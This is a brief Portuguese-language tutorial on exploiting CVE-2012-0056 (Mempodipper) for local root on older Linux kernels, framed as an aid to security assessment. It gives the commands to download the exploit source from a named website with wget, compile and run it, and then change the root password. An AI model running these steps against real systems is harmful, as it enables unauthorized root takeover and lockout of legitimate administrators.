A vulnerabilidade exibida no CVE-2012-0056 destaca a possibilidade de inserir um shell code na memória e obter acesso como root no kernel 2.6.39 e outras versões.
É um recurso interessante que pode lhe auxiliar durante a avaliação de segurança.
Logue com um usuário comum e verifique a versão no kernel.
Linuxuname -r
Realize o download do exploit mempodipper.c.
Linuxwget www.100security.com.br/downloads/mempodipper.c
Liste o arquivo mempodipper.c.
Linuxls -l
Compile o exploit utilizando o GCC.
Linuxgcc mempodipper.c -o mempodipper
O exploit mempodipper foi compilado.
Linuxls -l
Execute o exploit.
Linux./mempodipper
Acesso como root realizado com sucesso!
Linux./mempodipper
Altere a senha do root.
Linuxpasswd
Acesso como root com a nova senha realizada com sucesso!